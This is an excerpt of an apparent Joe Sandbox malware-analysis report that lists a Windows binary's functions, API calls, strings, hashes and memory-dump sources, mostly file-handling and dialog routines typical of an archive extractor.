Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c3009052681cb4fe34ffedd3df419aed7df44978b7edfe149079594866819cf9
Instruction ID: 89c26a5c292a286f63e2603ca45ee87d394c32d3c574eab7931c15f34ef57e62
Opcode Fuzzy Hash: c3009052681cb4fe34ffedd3df419aed7df44978b7edfe149079594866819cf9
Instruction Fuzzy Hash: 55A024C15D41013C31051171DD01C3F310CC5D0D11330411FFCC4D40447C441C010430

Function 0101E58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E580

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f1269bb9aea21e3fb017ae7978f8e658535360b9736b1d0bd60148697a477fce
Instruction ID: 70260e9c02718b751d92c92482ac81e99fdcac753987d2acba6f751e5cbfa044
Opcode Fuzzy Hash: f1269bb9aea21e3fb017ae7978f8e658535360b9736b1d0bd60148697a477fce
Instruction Fuzzy Hash: ECA024C155C1037C31051151DD01C3F310CC5C4D10330441FFCC5C40447C441C010430

Function 0101E5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E580

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 052e7c27bde04693a42f3ccfd863e322de2353411cb5fdb100c99cc7290fbe8f
Instruction ID: 70260e9c02718b751d92c92482ac81e99fdcac753987d2acba6f751e5cbfa044
Opcode Fuzzy Hash: 052e7c27bde04693a42f3ccfd863e322de2353411cb5fdb100c99cc7290fbe8f
Instruction Fuzzy Hash: ECA024C155C1037C31051151DD01C3F310CC5C4D10330441FFCC5C40447C441C010430

Function 0101E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7f986950e675d9268b2ff1ba1a43e13ed2dcf6b077fb993624ee12dd9de0f6b1
Instruction ID: 53698f3235a4866e2b57b2b641f58596c913735743a9ab9627f05dc3196745af
Opcode Fuzzy Hash: 7f986950e675d9268b2ff1ba1a43e13ed2dcf6b077fb993624ee12dd9de0f6b1
Instruction Fuzzy Hash: B3A004F555D1537C71055551DD05C7F131DC5D5D51330D51FFCD5D44445C441C451473

Function 0101E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0fca4b5a8eb2dadc990c60b72f38773de602d3ef6120de24d2fa20a74a24a50b
Instruction ID: 53698f3235a4866e2b57b2b641f58596c913735743a9ab9627f05dc3196745af
Opcode Fuzzy Hash: 0fca4b5a8eb2dadc990c60b72f38773de602d3ef6120de24d2fa20a74a24a50b
Instruction Fuzzy Hash: B3A004F555D1537C71055551DD05C7F131DC5D5D51330D51FFCD5D44445C441C451473

Function 0101E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b952171228d710f5548ca753f7af7b04102912a81dbb01e154d8fc2b5211550f
Instruction ID: 53698f3235a4866e2b57b2b641f58596c913735743a9ab9627f05dc3196745af
Opcode Fuzzy Hash: b952171228d710f5548ca753f7af7b04102912a81dbb01e154d8fc2b5211550f
Instruction Fuzzy Hash: B3A004F555D1537C71055551DD05C7F131DC5D5D51330D51FFCD5D44445C441C451473

Function 0101E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2316f976ebd558bfefc6c5d2b13a5a581e081a47cfd271eab90a06eb3742c35e
Instruction ID: 53698f3235a4866e2b57b2b641f58596c913735743a9ab9627f05dc3196745af
Opcode Fuzzy Hash: 2316f976ebd558bfefc6c5d2b13a5a581e081a47cfd271eab90a06eb3742c35e
Instruction Fuzzy Hash: B3A004F555D1537C71055551DD05C7F131DC5D5D51330D51FFCD5D44445C441C451473

Function 0101E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E3FC

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c97073bf6442b9f95dfadd859d926e23a7cf7704775c3323a65807a1dd2b7686
Instruction ID: 53698f3235a4866e2b57b2b641f58596c913735743a9ab9627f05dc3196745af
Opcode Fuzzy Hash: c97073bf6442b9f95dfadd859d926e23a7cf7704775c3323a65807a1dd2b7686
Instruction Fuzzy Hash: B3A004F555D1537C71055551DD05C7F131DC5D5D51330D51FFCD5D44445C441C451473

Function 01009F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,0100903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 01009F0C

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: fdca6560b5ee393511718fac952f18a8c81882639aae0eee3b767886141d7c7f
Instruction ID: d7a11264a7f8f978e2f0d6a0396ae504948641953a674c100492c999eab91746
Opcode Fuzzy Hash: fdca6560b5ee393511718fac952f18a8c81882639aae0eee3b767886141d7c7f
Instruction Fuzzy Hash: 83A0243004400D47DD101730C71400C7710F7117C030001D47007CF051C71F4407CF00

Function 0101AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,0101AE72,C:\Users\user\Desktop,00000000,0104946A,00000006), ref: 0101AC08

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 74b621d7e204367a8b53cc68256ab3adc079a597a2b0abbeb68be5432d713a69
Instruction ID: 5b9290ba93f63bd00ba45889395ca824d03d5855e80da6fa2305b001c5dde865
Opcode Fuzzy Hash: 74b621d7e204367a8b53cc68256ab3adc079a597a2b0abbeb68be5432d713a69
Instruction Fuzzy Hash: 7FA011302002008B82000A328B8AA0EBAAABFA2B20F00C028A08088020CB3AC820AA00

Function 01009620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(000000FF,?,?,010095D6,?,?,?,?,?,01032641,000000FF), ref: 0100963B

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: ef4ca47a0d06aa223ec60324e11d54b951d612392cf1208fd3d27fbb49532fb2
Instruction ID: b699d0f0767de549242a4d9c844c35bdcdb06aac75e9b6efa8171ecaf4f36f53
Opcode Fuzzy Hash: ef4ca47a0d06aa223ec60324e11d54b951d612392cf1208fd3d27fbb49532fb2
Instruction Fuzzy Hash: 54F089704C1B159FFB328A68C898792B7E86B16325F041B5ED0EA429E1D775618DCB40

Non-executed Functions

Function 0101C220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 01001316: GetDlgItem.USER32(00000000,00003021), ref: 0100135A
Part of subcall function 01001316: SetWindowTextW.USER32(00000000,010335F4), ref: 01001370

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0101C2B1
EndDialog.USER32(?,00000006), ref: 0101C2C4
GetDlgItem.USER32(?,0000006C), ref: 0101C2E0
SetFocus.USER32(00000000), ref: 0101C2E7
SetDlgItemTextW.USER32(?,00000065,?), ref: 0101C321
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0101C358
FindFirstFileW.KERNEL32(?,?), ref: 0101C36E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0101C38C
FileTimeToSystemTime.KERNEL32(?,?), ref: 0101C39C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0101C3B8
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0101C3D4
_swprintf.LIBCMT ref: 0101C404

Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5

SetDlgItemTextW.USER32(?,0000006A,?), ref: 0101C417
FindClose.KERNEL32(00000000), ref: 0101C41E
_swprintf.LIBCMT ref: 0101C477
SetDlgItemTextW.USER32(?,00000068,?), ref: 0101C48A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0101C4A7
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0101C4C7
FileTimeToSystemTime.KERNEL32(?,?), ref: 0101C4D7
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0101C4F1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0101C509
_swprintf.LIBCMT ref: 0101C535
SetDlgItemTextW.USER32(?,0000006B,?), ref: 0101C548
_swprintf.LIBCMT ref: 0101C59C
SetDlgItemTextW.USER32(?,00000069,?), ref: 0101C5AF

Part of subcall function 0101AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0101AF35
Part of subcall function 0101AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0103E72C,?,?), ref: 0101AF84

Strings

%s %s %s, xrefs: 0101C3F2, 0101C527
REPLACEFILEDLG, xrefs: 0101C247
%s %s, xrefs: 0101C469, 0101C58E

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: bec36f016cfc376905c8a3dd537652e2aaf7f8e0e551bc7764c43be41c67ce2e
Instruction ID: da0a8abd295e4b535dad5a26aebcaac267da91cb0451151e9f7264ebc25dd081
Opcode Fuzzy Hash: bec36f016cfc376905c8a3dd537652e2aaf7f8e0e551bc7764c43be41c67ce2e
Instruction Fuzzy Hash: ED917372148345BBE2319AA4DD49FFB7BECEB4A700F044819F7C9DA085D67AE6048762

Function 01006FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01006FAA
_wcslen.LIBCMT ref: 01007013
_wcslen.LIBCMT ref: 01007084

Part of subcall function 01007A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 01007AAB
Part of subcall function 01007A9C: GetLastError.KERNEL32 ref: 01007AF1
Part of subcall function 01007A9C: CloseHandle.KERNEL32(?), ref: 01007B00

Part of subcall function 0100A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0100977F,?,?,010095CF,?,?,?,?,?,01032641,000000FF), ref: 0100A1F1
Part of subcall function 0100A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0100977F,?,?,010095CF,?,?,?,?,?,01032641), ref: 0100A21F

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 01007139
CloseHandle.KERNEL32(00000000), ref: 01007155
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 01007298

Part of subcall function 01009DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,010073BC,?,?,?,00000000), ref: 01009DBC
Part of subcall function 01009DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 01009E70

Part of subcall function 01009620: CloseHandle.KERNELBASE(000000FF,?,?,010095D6,?,?,?,?,?,01032641,000000FF), ref: 0100963B

Part of subcall function 0100A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0100A325,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A501
Part of subcall function 0100A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0100A325,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A532

Strings

SeCreateSymbolicLinkPrivilege, xrefs: 01006FCC
SeRestorePrivilege, xrefs: 01006FC2
UNC\, xrefs: 01007051
\??\, xrefs: 0100702B

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3983180755-3508440684
Opcode ID: bf2a26336e1b7b833c00df88e19a8063f102071af744a2875899634320f1289f
Instruction ID: d468226b18f36b42239ba321f75972b55fbf4c9e34f8fb9fc6045c98d0c20a36
Opcode Fuzzy Hash: bf2a26336e1b7b833c00df88e19a8063f102071af744a2875899634320f1289f
Instruction Fuzzy Hash: 58C1B2B1900645AAFB26DB78CC81BEEB7ACBF14300F00455AF9D6E71C1D779B6848B61

Function 0102D8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0102DA34

Strings

1#QNAN, xrefs: 0102EC3A
1#IND, xrefs: 0102EC2C
1#SNAN, xrefs: 0102EC33
1#INF, xrefs: 0102EC41

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 245d211975a5d105f25307308636134d15ba307f3a7889432b04c623d2897bac
Instruction ID: 649a79ec5fab2f3b232b8cc015445a4b6726e495beb1da0414bcea7bfc4c180c
Opcode Fuzzy Hash: 245d211975a5d105f25307308636134d15ba307f3a7889432b04c623d2897bac
Instruction Fuzzy Hash: C1C24872E086298FDB65CE68DD407EAB7F5EB44304F1441EAD98DE7241E778AE818F40

Function 010032F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01003300
_swprintf.LIBCMT ref: 010036C7

Strings

h%u, xrefs: 010036BC
hc%u, xrefs: 0100370A
CMT, xrefs: 01003A17

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: H_prolog_swprintf
String ID: CMT$h%u$hc%u
API String ID: 146138363-3282847064
Opcode ID: 9530ba0b819ecdbc3288300584fe743c857c2e7d3dc8f941f89c47d554ec5c1e
Instruction ID: d59c60b1e4a6152a39eefc46e876a1faced6b55a6543b2a301688526d96e63b7
Opcode Fuzzy Hash: 9530ba0b819ecdbc3288300584fe743c857c2e7d3dc8f941f89c47d554ec5c1e
Instruction Fuzzy Hash: 9D32A1715106859FFB1ADF74C894AEA3BA5BF15300F0845BDEDCA8F2C2DA74A549CB20

Function 0100286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01002874
_strlen.LIBCMT ref: 01002E3F

Part of subcall function 010102BA: __EH_prolog.LIBCMT ref: 010102BF

Part of subcall function 01011B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0100BAE9,00000000,?,?,?,00010442), ref: 01011BA0

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01002F91

Strings

CMT, xrefs: 01002FBC

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
